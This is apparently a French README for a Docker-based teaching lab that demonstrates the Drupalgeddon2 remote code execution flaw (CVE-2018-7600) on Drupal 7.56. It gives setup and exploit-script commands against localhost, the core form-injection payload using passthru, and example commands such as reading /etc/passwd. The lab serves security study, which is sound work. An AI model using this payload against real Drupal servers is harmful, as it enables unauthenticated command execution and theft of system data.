
Laboratoire pédagogique démontrant l'exécution de code à distance CVE-2018-7600 (Drupalgeddon2) à l'aide d'un environnement Drupal 7.56 vulnérable basé sur Docker.
Laboratoire pédagogique démontrant l'exploitation de CVE-2018-7600 (Drupalgeddon2) à l'aide d'un environnement Drupal 7.56 vulnérable déployé avec Docker.
Ce projet simule un flux de travail réaliste d'évaluation de vulnérabilités, comprenant :
CVE-2018-7600 (Drupalgeddon2) est une vulnérabilité critique d'exécution de code à distance (RCE) dans le CMS Drupal.
Le problème se trouve dans la Form API de Drupal, où une entrée contrôlée par l'utilisateur peut être interprétée comme un tableau de rendu (render array), permettant à un attaquant d'injecter des callbacks malveillants tels que :
Cela conduit à une exécution de commandes non authentifiée sur le serveur.
Attacker (Kali Linux)
|
| HTTP Requests
v
Drupal 7.56 (Vulnerable)
|
v
MySQL Database
cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│ └── docker-compose.yml
│
├── screenshots/
│ ├── drupal-dashboard.png
│ ├── drupal-version.png
│ └── rce-output.png
│
├── logs/
│ ├── scan_results.txt
│ └── exploit_log.txt
│
├── payloads/
│ └── payload-list.txt
│
├── report/
│ └── drupalgeddon2-report.pdf


git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab
docker compose up -d
http://localhost:8080
python3 scan.py http://localhost:8080
Exemple de sortie :
[~] Scanning http://localhost:8080... VULNERABLE
python3 exploit.py http://localhost:8080 id
Exemple de sortie :
uid=33(www-data) gid=33(www-data)
Structure de base du payload utilisée :
name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami
Exemples de commandes :
whoami
id
cat /etc/passwd
Liste complète des payloads disponible dans :
payloads/payload-list.txt
Pour conserver une structure de dépôt propre et professionnelle :
Cette séparation garantit :
Ce laboratoire est destiné à :
Ce projet est destiné uniquement à des fins éducatives et de recherche.
N'essayez pas d'exploiter des systèmes sans autorisation explicite.
Les auteurs ne sont pas responsables de toute mauvaise utilisation.